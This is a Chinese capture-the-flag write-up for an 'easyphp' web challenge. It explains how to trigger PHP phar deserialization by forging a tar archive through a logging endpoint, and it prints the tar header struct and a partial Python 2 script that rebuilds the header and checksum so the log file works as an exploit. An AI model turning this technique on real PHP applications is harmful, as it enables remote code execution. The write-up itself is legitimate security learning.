在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析
看看首页源码
再看这里很明显是触发phar反序列化
如何插入数据是一个问题,这里没有上传,再看log.php
关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来他也可以用来触发反序列化之前说过,并且不需要像phar那样去计算签名
先生成一个phar
再生成一个tar
下面做个实验,首先生成了一个tar与phar,在后面加点字符看看还能触发么
验证一下确实可行
那么我们就可以去尝试构造了对吧
首先我们要知道tar只是一个归档文件,并不进行压缩,这点别记错了
这是官方文档对于tar的介绍:https://jackrabbit.apache.org/oak/docs/nodestore/segment/tar.html
来看看他的结构
struct tar_header { char name[100]; char mode[8]; char uid[8]; char gid[8]; char size[12]; char mtime[12]; char chksum[8]; char typeflag; char linkname[100]; char magic[6]; char version[2]; char uname[32]; char gname[32]; char devmajor[8]; char devminor[8]; char prefix[155]; char padding[12]; };
以上是Tar中保存文件信息的数据结构,其后跟着的就是文件的内容。
简单写个脚本,剩下部分自己写吧,留一点算作业,这里用python2,python3的ord有限制,不好用
def calc_checksum(data): final = 0 calc_data = data[:148]+data[156:512] for i in calc_data: final += ord(str(i)) return final+256 def make_tar(name): with open(name, "rb") as f: data = f.read() type = "y4tacker" generated_metadata = "Time: " + "2021-11-20 18:45:53" + " IP: [], REQUEST: [log_type=" + type + "], CONTENT: [" new_name = generated_metadata.ljust(100,'\x00').encode() new_data = new_name + data[100:] checksum = calc_checksum(new_data) new_checksum = oct(checksum).rjust(7,'0').encode()+b'\x00' new_data = new_name + data[100:148] + new_checksum + data[156:] with open("get_flag.log", "wb") as f: f.write(new_data) f.write(b"]\n")
最终获得flag
https://blog.csdn.net/DisMisPres/article/details/94733424